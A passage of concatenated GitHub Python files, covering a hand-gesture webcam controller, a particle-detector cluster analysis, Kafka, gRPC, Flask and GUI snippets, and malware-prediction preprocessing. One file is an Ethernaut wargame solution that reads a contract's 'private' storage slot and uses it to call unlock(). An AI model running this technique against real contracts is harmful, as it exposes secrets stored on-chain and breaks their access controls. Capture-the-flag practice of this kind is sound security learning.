int(VIDEO_WIDTH / 3)  # Reduce the size of the video that is shown on the display\nVIDEO_HEIGHT = int(VIDEO_HEIGHT / 3)\n\nHAND_GESTURE_MODEL_PATH = './external/Kazuhito00/model/keypoint_classifier/keypoint_classifier_screen_control.tflite'\n\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_drawing = mp.solutions.drawing_utils\nhand_draw_q = queue.Queue()\n\n\ndef draw_hand_results(results, image, hand_dict: dict) -> bool:  # pragma: no cover\n    \"\"\"\n    Draw the hand results computed by mediapipe, and return a False flag if the user pressed ESC to quit the program.\n    The hand drawing is based on mediapipe's sample code, which can be found in the \"external\" dir.\n    \"\"\"\n    image.flags.writeable = True\n    image = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n    left_hand_id = None\n    right_hand_id = None\n    if results.multi_hand_landmarks:\n        for hand_landmarks in results.multi_hand_landmarks:\n            mp_drawing.draw_landmarks(image, hand_landmarks, mp.solutions.hands.HAND_CONNECTIONS,\n                                      mp_drawing_styles.get_default_hand_landmarks_style(),\n                                      mp_drawing_styles.get_default_hand_connections_style())\n        left_hand_id = hand_dict.get('left').get('id')\n        right_hand_id = hand_dict.get('right').get('id')\n    cv.putText(image, 'Left hand ID: ' + str(left_hand_id), (10, 30),\n               cv.FONT_HERSHEY_SIMPLEX, 1.0, (255, 0, 0), 2, cv.LINE_AA)\n    cv.putText(image, 'Right hand ID: ' + str(right_hand_id), (10, 60),\n               cv.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv.LINE_AA)\n    cv.imshow('MediaPipe Hands', image)\n    is_continue = True\n    if cv.waitKey(5) & 0xFF == 27:\n        is_continue = False\n    return is_continue\n\n\nclass HandGestureController:\n    \"\"\"\n    Load opencv 
to capture hands from the webcam, use mediapipe to get the hand key points, use the trained customized\n model to identify the hand id, and finally call command_executor.execute_command_based_on_hand_signs.\n To reduce the latency, the plotting is executed in a separate thread.\n \"\"\"\n\n def __init__(self, video_device_id=VIDEO_DEVICE_ID, video_width=VIDEO_WIDTH, video_height=VIDEO_HEIGHT):\n self._videoCap = cv.VideoCapture(video_device_id)\n self._videoCap.set(cv.CAP_PROP_FRAME_WIDTH, video_width)\n self._videoCap.set(cv.CAP_PROP_FRAME_HEIGHT, video_height)\n self._hand_sign_classifier = None\n self._command_executor_instance = None\n self._continue_main_thread = True\n\n def start_hand_gesture_recognition(self, show_hands=False, show_faces=False):\n self._check_if_all_models_ready()\n if show_hands:\n self._start_hand_drawing_threading()\n mp_hands = mp.solutions.hands\n with mp_hands.Hands(model_complexity=0, min_detection_confidence=0.5, min_tracking_confidence=0.5,\n max_num_hands=2) as hands:\n while self._videoCap.isOpened():\n if self._continue_main_thread is False: break\n hand_dict = None\n try:\n mediapipe_hand_results, image = self._get_mediapipe_hand_results(hands)\n if mediapipe_hand_results.multi_hand_landmarks is not None:\n hand_dict \\\n = self._get_dict_of_left_right_hands_sign_ids_and_landmarks(mediapipe_hand_results, image)\n if show_hands:\n self._put_hands_to_hand_draw_q(show_faces, mediapipe_hand_results, image, hand_dict)\n if hand_dict is not None:\n self._command_executor_instance. \\\n execute_command_based_on_hand_signs(left_hand_sign_id=hand_dict.get('left').get('id'),\n left_hand_landmark=hand_dict.get('left').get(\n 'landmark'),\n right_hand_sign_id=hand_dict.get('right').get('id'),\n right_hand_landmark=hand_dict.get('right').get(\n 'landmark'))\n\n except (KeyboardInterrupt, Exception):\n traceback.print_exc()\n break\n\n self._videoCap.release()\n cv.destroyAllWindows()\n logging.info('Process finished successfully!')\n\n def load_kazuhito00_hand_sign_classifier(self, model_path: str = HAND_GESTURE_MODEL_PATH):\n if not os.path.exists(model_path):\n raise Exception(model_path + ' does not exist!')\n self._hand_sign_classifier = KeyPointClassifier(model_path=model_path)\n\n def set_command_executor(self, command_executor: com_exe.CommandExecutor):\n self._command_executor_instance = command_executor\n\n def _check_if_all_models_ready(self):\n if self._hand_sign_classifier is None:\n raise Exception('Hand_sign_classifier not assigned!')\n if self._command_executor_instance is None:\n raise Exception('Command_executor_instance not assigned!')\n\n def _get_mediapipe_hand_results(self, hands): # pragma: no cover\n success, image = self._videoCap.read()\n if not success:\n raise Exception('Image read error!')\n image = cv.flip(image, 1)\n image = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n image.flags.writeable = False # To improve performance\n return hands.process(image), image\n\n def _get_dict_of_left_right_hands_sign_ids_and_landmarks(self, mediapipe_hand_results, image) -> dict:\n \"\"\"\n Classify each detected hand and collect its sign id and landmarks per handedness.\n\n :param mediapipe_hand_results: output of mediapipe's Hands.process()\n :param image: the frame the landmarks were computed on\n :return: dict with 'left' and 'right' entries, each holding an 'id' and a 'landmark'\n \"\"\"\n hands_sign_ids_and_landmarks_dict = {'left': {\n 'id': None,\n 'landmark': None\n }, 'right': {\n 'id': None,\n 'landmark': None\n }}\n for hand_landmarks, handedness in zip(mediapipe_hand_results.multi_hand_landmarks,\n mediapipe_hand_results.multi_handedness):\n landmark_list = calc_landmark_list(image, hand_landmarks)\n pre_processed_landmark_list = pre_process_landmark(landmark_list)\n 
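# Note on the call below (a sketch of the assumed Kazuhito00 interface, not stated in this file):\n # pre_process_landmark is assumed to flatten the 21 hand key points into wrist-relative, normalised\n # coordinates, so the classifier receives a fixed-length float list and returns an integer sign id.\n 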
hand_sign_id = self._hand_sign_classifier(pre_processed_landmark_list)\n left_or_right_str = handedness.classification[0].label[0:].lower()\n hands_sign_ids_and_landmarks_dict[left_or_right_str] = {'id': hand_sign_id,\n 'landmark': hand_landmarks.landmark}\n return hands_sign_ids_and_landmarks_dict\n\n def _start_hand_drawing_threading(self):\n \"\"\"\n Draw the hands in a separate thread.\n \"\"\"\n threading.Thread(target=self._hand_drawing_threading_func, daemon=True).start()\n\n def _hand_drawing_threading_func(self):\n \"\"\"\n This is the target function of threading.Thread\n It will get the required arguments from the threading queue hand_draw_q, and pass the arguments to\n draw_hand_results.\n It will stop the main thread if draw_hand_results() returns False\n \"\"\"\n while True:\n args = hand_draw_q.get()\n if not draw_hand_results(*args):\n self._continue_main_thread = False\n break\n\n @staticmethod\n def _put_hands_to_hand_draw_q(show_faces, mediapipe_hand_results, image, hand_dict):\n if show_faces:\n image_to_plot = copy.deepcopy(image)\n else:\n image_to_plot = np.zeros((VIDEO_HEIGHT, VIDEO_WIDTH, 3), np.uint8)\n args = (mediapipe_hand_results, image_to_plot, hand_dict)\n hand_draw_q.put_nowait(args)\n","repo_name":"wengchenyang1/Offline-Screen-Control-Sharing","sub_path":"src/hand_gesture_controller.py","file_name":"hand_gesture_controller.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72299787626","text":"'''\nPython script to study the origin of the clusters in MC.\nRun: python ClusterOriginStudy.py\n'''\nfrom ROOT import TFile, TH1F, TH2F, TCanvas, TMath, TLegend, kRainBow, kBlack, kRed, kPink, kAzure, kOrange, kSpring, kOpenCircle, kFullCross, kFullSquare, TLatex, kMagenta, kCyan # pylint: disable=import-error,no-name-in-module\nimport sys\nimport numpy as np\nimport pandas as pd\nimport uproot\nfrom alive_progress import alive_bar\nimport matplotlib.pyplot as plt\nsys.path.append('..')\nfrom utils.AnalysisUtils import ComputeRatioDiffBins, MCProcess\n# SetObjectStyle is used below but was never imported; its location is assumed from this repo's utils layout\nfrom utils.StyleFormatter import SetObjectStyle\n\nmarkers = [kOpenCircle, kFullSquare]\n\ndef main():\n #----------------------------------------------------------------\n data = '/home/spolitan/Analyses/ITS_Cluster_Studies/macros/outFileMCid_thr0_1207_MCtree_morning.root'\n outlabel = 'globalMC_wcut_1207'\n query = ''\n outFile = TFile(f'MCOriginStudy{outlabel}.root', 'recreate')\n Vars = [] # if left empty consider all the vars\n enabledProcesses = ['d-rays', 'Primary', 'HInhelastic', 'Hadronic', 'PositronNuclear', 'ElectronNuclear', 'Pair']\n doLayerStudy = True # if true, study the cluster size on each layer\n doLayerFracStudy = False # if true, study the fraction of d-rays on each layer and close \n #----------------------------------------------------------------\n\n # read data\n df = uproot.open(data)['MCtree'].arrays(library='pd')\n df_sel = df\n df_sel['E_mev'] = df_sel['E'] * 1000\n \n if query != '':\n print(f'\\033[1m\\033[93mApplying query: {query}\\033[0m')\n df_sel = df_sel.query(query, inplace=False)\n\n df_sel_proc = []\n labels = []\n colors = [kAzure+4, kRed+1, kSpring+3, kOrange+1, kPink+1, kCyan+1, kMagenta+1]\n\n print(f'\\033[1mEnabled processes: {enabledProcesses}\\033[0m')\n for i, idProcess in enumerate(df_sel['ProcessID'].unique()):\n label = MCProcess(idProcess)\n if label not in enabledProcesses:\n continue\n labels.append(label)\n df_sel_proc.append(df_sel.query(f'ProcessID == {idProcess}'))\n\n # delta rays energy distribution\n subdir = 
outFile.mkdir('EkinStudy')\n outFile.cd('EkinStudy')\n if 'd-rays' in enabledProcesses:\n df_kin_study = df_sel_proc[labels.index('d-rays')]\n print(f'\\033[1mEkin study for d-rays: \\033[0m')\n hEkin = TH1F('hEkin', 'hEkin;E_{tot} [MeV]; Events', 1000, 0, 1)\n hEtotal = TH1F('hEtotal', 'hEtotal;E_{kin} [MeV];Events', 1000, 0, 1)\n hEkin_Clsize_corr = [TH2F(f'hEkin_Clsize_corr_L{i}',\n f'hEkin_Clsize_corr_L{i};E_{{kin}} [MeV];Cluster size',\n 1000, 0, 1, 100, 0, 100) for i in range(7)]\n\n for i, (E_mev, clsize, layer) in enumerate(zip(df_kin_study['E_mev'],\n df_kin_study['CLsize'],\n df_kin_study['Layer'])):\n hEtotal.Fill(E_mev)\n Ekin = E_mev - 0.511 # electron mass\n hEkin.Fill(Ekin)\n hEkin_Clsize_corr[layer].Fill(Ekin, clsize)\n hEtotal.Write()\n hEkin.Write()\n for h in hEkin_Clsize_corr:\n h.Write()\n else:\n print(f'Ekin study implemented only for d-rays. Make sure d-rays are the first process in the list of enabled processes!')\n outFile.cd()\n\n if doLayerFracStudy:\n print(f'\\033[1mLayer fraction study\\033[0m')\n subdir = outFile.mkdir('LayerFracStudy')\n if enabledProcesses == ['d-rays']:\n hLayers = TH1F('hLayers', 'hLayers', 7, -0.5, 6.5)\n hLayersOver40 = TH1F('hLayersOver40', 'hLayersOver40', 7, -0.5, 6.5)\n for i, (layer, clsize) in enumerate(zip(df_sel_proc[0]['Layer'], df_sel_proc[0]['CLsize'])):\n hLayers.Fill(layer)\n if clsize > 40:\n hLayersOver40.Fill(layer)\n #SetHistStyle(hLayers, kBlack, kOpenCircle, 'Layer', '#delta-rays per layer')\n #SetHistStyle(hLayersOver40, kRed, kOpenCircle, 'Layer', '#delta-rays > 40 per layer')\n hLayers.Write()\n hLayersOver40.Write()\n outFile.Write()\n else:\n print(f'Layer fraction study not implemented for {enabledProcesses}. Continue.')\n\n print(f'\\033[1mEnabled variables: {Vars}\\033[0m')\n if not Vars:\n Vars = df.keys()\n binning, mins, maxs = ([] for i in range(3))\n for var in Vars:\n if var == 'eta':\n binning.append(100)\n mins.append(-3.14)\n maxs.append(3.14)\n\n elif var == 'phi':\n binning.append(100)\n mins.append(0)\n maxs.append(6.28)\n\n elif var == 'X' or var == 'Y' or var == 'Z':\n binning.append(100)\n mins.append(-100)\n maxs.append(100)\n\n elif var == 'CLsize':\n binning.append(100)\n mins.append(0.)\n maxs.append(100)\n\n elif var == 'Layer':\n binning.append(7)\n mins.append(-0.5)\n maxs.append(6.5)\n\n elif var == 'p':\n binning.append(100)\n mins.append(0)\n maxs.append(1)\n\n else:\n binning.append(100)\n mins.append(0.)\n maxs.append(100)\n\n with alive_bar(len(Vars), title=\"Plotting variables\") as bar:\n for i, (var, bins, minvar, maxvar) in enumerate(zip(Vars, binning, mins, maxs)):\n print(f'\\033[1mPlotting variable: {var}\\033[0m')\n hVar = TH1F(f'h{var}', f';{var}; counts', bins, minvar, maxvar)\n\n if doLayerStudy and var == 'CLsize':\n hCL_vs_layer = TH2F('hCL_vs_layer', 'hCL_vs_layer; Layer; Cluster size', 7, -0.5, 6.5, 100, 0, 100)\n hCL = [TH1F(f'hCL{i}', f'; Cluster size; Counts', 100, 0, 100) for i in range(7)]\n\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n hXY = TH2F(f'hXY', ';X (cm);Y (cm)', 1200, -60, 60, 1200, -60, 60)\n hXZ = TH2F(f'hXZ', ';X (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60)\n hYZ = TH2F(f'hYZ', ';Y (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60)\n\n hVarSel_proc, hCL_proc = [], [] # list of TH1F for each process\n hXY_proc, hXZ_proc, hYZ_proc = [], [], [] # list of TH2F for each process\n for k, label in enumerate(labels):\n hVarSel_proc.append(TH1F(f'h{var}Sel_proc{label}', f';{var}; counts', bins, minvar, maxvar))\n if 'X' in Vars and 'Y' in Vars 
and 'Z' in Vars and var == 'X':\n hXY_proc.append(TH2F(f'hXY_proc{label}', ';X (cm);Y (cm)', 1200, -60, 60, 1200, -60, 60))\n hXZ_proc.append(TH2F(f'hXZ_proc{label}', ';X (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60))\n hYZ_proc.append(TH2F(f'hYZ_proc{label}', ';Y (cm);Z (cm)', 1200, -60, 60, 1200, -60, 60))\n if doLayerStudy and var == 'CLsize':\n hCL_proc.append([TH1F(f'hCL{i}proc{label}', f'hCL_L{i}proc{label}; Cluster size', 100, 0, 100) for i in range(7)])\n SetObjectStyle(hCL_proc[k][i], linecolor=colors[k], fillcolor=colors[k], markerstyle=20, markercolor=colors[k], markersize=0.5)\n \n # filling histograms\n for i in (df_sel[f'{var}']): # loop over all events\n hVar.Fill(i)\n\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n for i, (x, y, z) in enumerate(zip(df_sel['X'], df_sel['Y'], df_sel['Z'])):\n hXY.Fill(x, y)\n hXZ.Fill(x, z)\n hYZ.Fill(y, z)\n for i, dfproc in enumerate(df_sel_proc):\n for j, (x, y, z) in enumerate(zip(dfproc['X'], dfproc['Y'], dfproc['Z'])):\n hXY_proc[i].Fill(x, y)\n hXZ_proc[i].Fill(x, z)\n hYZ_proc[i].Fill(y, z)\n\n if doLayerStudy and var == 'CLsize':\n for i, (clsize, layer) in enumerate(zip(df_sel[f'{var}'], df_sel['Layer'])):\n hCL[layer].Fill(clsize)\n hCL_vs_layer.Fill(layer, clsize)\n for i, dfproc in enumerate(df_sel_proc):\n for j, (clsize, layer) in enumerate(zip(dfproc[f'{var}'], dfproc['Layer'])):\n hCL_proc[i][layer].Fill(clsize)\n cClvsLayer_contrib = []\n hRatio = []\n leg = TLegend(0.5, 0.6, 0.7, 0.8)\n leg.SetBorderSize(0)\n for i in range(7):\n hRatio.append([])\n cClvsLayer_contrib.append(TCanvas(f\"cClvsLayer{i}_contrib\", \"\", 1600, 900))\n cClvsLayer_contrib[i].Divide(2, 1)\n cClvsLayer_contrib[i].cd(1).DrawFrame(0, 0, 100, 100, '; Cluster size L; Counts')\n cClvsLayer_contrib[i].cd(1).SetLogy()\n SetObjectStyle(hCL[i], linecolor=kBlack, fillcolor=kBlack, marker=kOpenCircle, fillalpha=0.2)\n hCL[i].SetStats(0)\n hCL[i].Draw('hist')\n if i == 0:\n leg.AddEntry(hCL[i], 'All', 'l')\n for j, h in enumerate(hCL_proc):\n SetObjectStyle(h[i], linecolor=colors[j], markercolor=colors[j],\n fillcolor=colors[j], marker=kOpenCircle, fillalpha=0.2)\n h[i].Draw('samehist')\n if i == 0:\n leg.AddEntry(h[i], labels[j], 'l')\n proc = labels[j]\n hRatio[i].append(h[i].Clone(f'hRatio{i}proc{proc}'))\n hRatio[i][j].Divide(hCL[i])\n SetObjectStyle(hRatio[i][j], linecolor=colors[j], markercolor=colors[j],\n fillcolor=colors[j], marker=kOpenCircle, fillalpha=0.2)\n leg.Draw('same')\n cClvsLayer_contrib[i].cd(2).SetLogy()\n cClvsLayer_contrib[i].cd(2).DrawFrame(0, 0.001, 100, 2.0, '; Cluster size; Ratio')\n for j, h in enumerate(hRatio[i]):\n h.Draw('samehist')\n \n leg_proc = TLegend(0.5, 0.6, 0.7, 0.8)\n leg_proc.SetBorderSize(0)\n leg_proc.AddEntry(hVar, 'All', 'l')\n for i, dfproc in enumerate(df_sel_proc): # loop over all processes\n for j in (dfproc[f'{var}']): # loop over all events\n hVarSel_proc[i].Fill(j)\n leg_proc.AddEntry(hVarSel_proc[i], labels[i], 'l')\n\n SetObjectStyle(hVar, markercolor=kBlack, marker=kOpenCircle, fillalpha=0.5, linewidth=2, fillcolor=kBlack)\n for i, h in enumerate(hVarSel_proc):\n SetObjectStyle(h, color=colors[i], fillcolor=colors[i], fillalpha=0.5, linewidth=2, marker=kOpenCircle, markercolor=colors[i])\n\n outFile.mkdir(f'{var}') if not outFile.Get(f'{var}') else None\n outFile.cd(f'{var}')\n c1 = TCanvas(f\"c{var}\", \"\", 1800, 1200)\n hVar.Draw('histesame')\n hVar.Write()\n for i, h in enumerate(hVarSel_proc):\n h.Draw('histesame')\n h.Write()\n leg_proc.Draw('same')\n c1.Write()\n 
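# Bookkeeping note: every variable gets its own TDirectory inside the output file, so the\n # cd('../') below returns to the file's top level before the next block writes its objects.\n 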
outFile.cd('../')\n\n if 'X' in Vars and 'Y' in Vars and 'Z' in Vars and var == 'X':\n outFile.mkdir('space_correlation') if not outFile.GetDirectory('space_correlation') else None\n outFile.cd('space_correlation')\n hXY.Write()\n hXZ.Write()\n hYZ.Write()\n for i, (hXYp, hXZp, hYZp) in enumerate(zip(hXY_proc, hXZ_proc, hYZ_proc)):\n hXYp.Write()\n hXZp.Write()\n hYZp.Write()\n outFile.cd('../')\n\n if doLayerStudy and var == 'CLsize':\n outFile.mkdir('CL_vs_layer') if not outFile.GetDirectory('CL_vs_layer') else None\n outFile.cd('CL_vs_layer')\n hCL_vs_layer.Write()\n for i, h in enumerate(hCL):\n h.Write()\n for i, hproc in enumerate(hCL_proc):\n for j, h in enumerate(hproc):\n h.Write()\n outFile.mkdir('CL_vs_layer/contributions') if not outFile.GetDirectory('CL_vs_layer/contributions') else None\n outFile.cd('CL_vs_layer/contributions')\n for i, hRatioLayer in enumerate(hRatio):\n for j, h in enumerate(hRatioLayer):\n h.Write()\n for i in range(7):\n cClvsLayer_contrib[i].Write()\n cClvsLayer_contrib[i].SaveAs(f'cClvsLayer{i}_contrib.png')\n outFile.cd('../../')\n bar()\n\n outFile.Close()\n input('Press enter to exit')\n sys.exit()\n\nmain()\n","repo_name":"fmazzasc/ITS_Cluster_Studies","sub_path":"py/ClusterOriginStudy.py","file_name":"ClusterOriginStudy.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"33365878497","text":"from scripts.helpful_scripts import get_account\nfrom brownie import web3, interface\n\n\nETHERNAUT_INSTANCE = \"0xbf0cdE8daAdF37782fC6c250097a53900BfEEcaD\"\nGAS_LIMIT = 6000000\n\n\ndef main():\n\n player = get_account()\n target = interface.IPrivacy(ETHERNAUT_INSTANCE)\n\n # store_4 = web3.eth.get_storage_at(ETHERNAUT_INSTANCE, 4)\n # print(f\"store 4 = {store_4}\")\n\n store_5 = web3.eth.get_storage_at(ETHERNAUT_INSTANCE, 5)\n print(f\"store 5 = {store_5}\")\n\n # assign the key data\n data = store_5\n\n # key = bytes(data[:16])\n key = data[:16]\n # print(key)\n\n print(f\"\\nLocked status: {target.locked()}\\n\")\n target.unlock(key, {\"from\": player, \"gas_limit\": GAS_LIMIT, \"allow_revert\": True})\n print(f\"\\nLocked status: {target.locked()}\\n\")\n","repo_name":"sarobinson2011/ethernaut-brownie","sub_path":"scripts/12-deploy_attack.py","file_name":"12-deploy_attack.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74696383468","text":"# Import the required modules\nfrom kafka import KafkaConsumer\nimport json\n\n\n# Define the Kafka connection settings\nKAFKA_TOPIC = 'velib_data'\n\n\n# Create a Kafka consumer\nconsumer = KafkaConsumer(KAFKA_TOPIC, bootstrap_servers='localhost:9092')\n\n\n# Loop to consume the messages from the Kafka topic\nfor msg in consumer:\n # Retrieve the message data\n \n # decode the raw message payload to a string\n station = msg.value.decode()\n print(station)\n\n\n","repo_name":"keagnon/Project-kafka-Spark-DB-ML","sub_path":"Récupération_des_données/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6739655937","text":"\n\nfrom Generic.patterns.observer import Observer, Subject\nfrom Generic.decoration import alias\n\n\nclass Channels(Subject):\n\n @alias(Subject, 'attach')\n def subscribe(self, client):\n print(client)\n self._observers.append(client)\n\n\nclass 
Client(Observer):\n\n @alias(Observer, 'update')\n def receive(self, channel: Channels):\n print(channel, 1)\n\nclass Client2(Observer):\n\n def update(self, subject):\n print('sss')\n\n\nchannel = Channels()\nclient = Client()\nclient2 = Client2()\nchannel.attach(client)\nchannel.attach(client2)\nchannel.notify()\n\n","repo_name":"hc-tec/pydis","sub_path":"testcase/Generic/patterns/observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12651208013","text":"from guizero import App, Text, TextBox, PushButton\n\n\ndef calc():\n try:\n if tbxNumber.get() != \"\":\n number = int(tbxNumber.get())\n output = number * 2\n txtOutput.set(str(number) + \" doubled is \" + str(output))\n tbxNumber.set(\"\")\n else:\n txtOutput.set(\"Error: No number entered\")\n except ValueError:\n txtOutput.set(\"Error: Invalid number entered\")\n\n\nwindow1 = App(\"Doubler\",\n height=180, width=340,\n layout=\"grid\")\n\nText(window1, \" \", grid=[0, 0]) # Spacer\n\nText(window1, \" Enter a number \", grid=[1, 1])\n\ntbxNumber = TextBox(window1, grid=[1, 2], align=\"left\")\n\nText(window1, grid=[2, 0]) # Spacer\n\nPushButton(window1, text=\"Click to Double\",\n command=calc, grid=[3, 1])\n\ntxtOutput = Text(window1, grid=[3, 2])\n\nText(window1, grid=[4, 0]) # Spacer\n\nPushButton(window1, text=\" Exit \",\n command=quit, grid=[5, 1])\n\nwindow1.display()\n","repo_name":"emailman/Raspberry_Pi_Heater","sub_path":"forms/alert1.py","file_name":"alert1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74851073387","text":"import sys\r\ntry:\r\n x=int(input(\"Enter a number : \"))\r\n y=int(input(\"Enter another number :\"))\r\nexcept ValueError:\r\n print(\"Error: Input must be a number\")\r\n sys.exit(1)\r\n\r\ntry: \r\n result = x/y\r\nexcept ZeroDivisionError:\r\n print(\"Error: Cannot divide by zero\")\r\n sys.exit(1)\r\n\r\nprint(f\"{x}/{y}={result}\")\r\n","repo_name":"SiddharthJadhav99/Python_Basics","sub_path":"exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18468790378","text":"import cv2\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport time\r\n\r\ncap = cv2.VideoCapture(0) # 0: default camera\r\n\r\nwhile cap.isOpened():\r\n # Read a frame from the camera\r\n success, frame = cap.read()\r\n if success:\r\n # Show the frame\r\n cv2.imshow('Camera Window', frame)\r\n\r\n # Capture when ESC is pressed\r\n key = cv2.waitKey(1) & 0xFF\r\n if (key == 27):\r\n return_value, image = cap.read()\r\n cv2.imwrite(\"opencv.jpg\", image)\r\n time.sleep(1)\r\n\r\n pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'\r\n text = pytesseract.image_to_string(Image.open(\"opencv.jpg\"), lang=\"kor\")\r\n\r\n print(text.replace(\" \", \"\"))\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"CreamMeatball/OpenSourceSoftware","sub_path":"팀프로젝트/opencvtext_cam.py","file_name":"opencvtext_cam.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29969508866","text":"import pandas as pd\nfrom flask import Flask, jsonify\n\napp = Flask(__name__)\n\n\n# Build the API endpoints\n@app.route(\"/\")\ndef homepage():\n return "API 
is up and running!!!"\n\n\n# Get the sales\n@app.route(\"/pegarvendas\")\ndef pegarvendas():\n tabela = pd.read_csv(\"pegarvendas.csv\")\n total_vendas = tabela[\"Vendas\"].sum()\n resposta = {'total_vendas': total_vendas}\n return jsonify(resposta)\n\n\n# run the API server\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"DeividBertapele/Flask_FastAPI_Python","sub_path":"API_Python_Pandas/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25757606237","text":"import grpc\nfrom concurrent import futures\nimport math_pb2_grpc\nimport math_pb2\n\nclass Calc(math_pb2_grpc.CalcServicer):\n def Mult(self, request, context):\n # request is a MultRequest obj\n print(request)\n result = request.x * request.y\n return math_pb2.MultResp(result=result)\n\nserver = grpc.server(futures.ThreadPoolExecutor(max_workers=10), options=[(\"grpc.so_reuseport\", 0)])\n\nmath_pb2_grpc.add_CalcServicer_to_server(Calc(), server)\nprint(\"start listening on port 5444\")\nserver.add_insecure_port('localhost:5444')\nserver.start()\nserver.wait_for_termination()\n","repo_name":"cs544-wisc/s23","sub_path":"lec/10-rpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"32673171375","text":"import tldextract\n\ndef func():\n url = input(\"Enter URL: \")\n if url != \"\":\n extracted_info = tldextract.extract(url)\n print(\"Extraction result:\", extracted_info)\n print(\"Domain name:\", extracted_info.domain)\n else:\n print(\"Empty string\")\n url = \"https://github.com/W83w?tab=repositories\"\n return url\n\n","repo_name":"W83w/TestTasks","sub_path":"Neoflex/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72533357866","text":"import pandas as pd\nimport numpy as np\nimport lightgbm as lgb\n#import xgboost as xgb\nfrom scipy.sparse import vstack, csr_matrix, save_npz, load_npz\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.neural_network import MLPRegressor\n#from sklearn.metrics import roc_auc_score\nimport gc\ngc.enable()\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nfrom dtypes import dtypes\n\nprint('Download Train and Test Data.\\n')\ntrain = pd.read_csv('train.csv', dtype=dtypes, low_memory=True)\ntrain['MachineIdentifier'] = train.index.astype('uint32')\ntest = pd.read_csv('test.csv', dtype=dtypes, low_memory=True)\ntest['MachineIdentifier'] = test.index.astype('uint32')\n\ngc.collect()\n\nprint('Transform all features to category.\\n')\nfor usecol in train.columns.tolist()[1:-1]:\n\n train[usecol] = train[usecol].astype('str')\n test[usecol] = test[usecol].astype('str')\n \n #Fit LabelEncoder\n le = LabelEncoder().fit(\n np.unique(train[usecol].unique().tolist()+\n test[usecol].unique().tolist()))\n\n #At the end 0 will be used for dropped values\n train[usecol] = le.transform(train[usecol])+1\n test[usecol] = le.transform(test[usecol])+1\n\n agg_tr = (train\n .groupby([usecol])\n .aggregate({'MachineIdentifier':'count'})\n .reset_index()\n .rename({'MachineIdentifier':'Train'}, axis=1))\n agg_te = (test\n .groupby([usecol])\n .aggregate({'MachineIdentifier':'count'})\n .reset_index()\n 
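# The merge below aligns the per-category counts of train and test; a category value is then kept\n # only if it has more than 1000 train rows and a train share between 20% and 80% of the combined\n # total, so rare or train/test-unbalanced values all collapse to the reserved label 0.\n 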
.rename({'MachineIdentifier':'Test'}, axis=1))\n\n agg = pd.merge(agg_tr, agg_te, on=usecol, how='outer').replace(np.nan, 0)\n #Select values with more than 1000 observations\n agg = agg[(agg['Train'] > 1000)].reset_index(drop=True)\n agg['Total'] = agg['Train'] + agg['Test']\n #Drop unbalanced values\n agg = agg[(agg['Train'] / agg['Total'] > 0.2) & (agg['Train'] / agg['Total'] < 0.8)]\n agg[usecol+'Copy'] = agg[usecol]\n\n train[usecol] = (pd.merge(train[[usecol]], \n agg[[usecol, usecol+'Copy']], \n on=usecol, how='left')[usecol+'Copy']\n .replace(np.nan, 0).astype('int').astype('category'))\n\n test[usecol] = (pd.merge(test[[usecol]], \n agg[[usecol, usecol+'Copy']], \n on=usecol, how='left')[usecol+'Copy']\n .replace(np.nan, 0).astype('int').astype('category'))\n\n del le, agg_tr, agg_te, agg, usecol\n gc.collect()\n \ny_train = np.array(train['HasDetections'])\ntrain_ids = train.index\ntest_ids = test.index\n\ndel train['HasDetections'], train['MachineIdentifier'], test['MachineIdentifier']\ngc.collect()\n\nprint(\"If you don't want to use a Sparse Matrix, choose Kernel Version 2 to get a simpler solution.\\n\")\n\nprint('--------------------------------------------------------------------------------------------------------')\nprint('Transform Data to Sparse Matrix.')\nprint('A Sparse Matrix can be used to fit a lot of models, e.g. XGBoost, LightGBM, Random Forest, K-Means, etc.')\nprint('To concatenate Sparse Matrices by column use hstack()')\nprint('Read more about Sparse Matrix https://docs.scipy.org/doc/scipy/reference/sparse.html')\nprint('Good 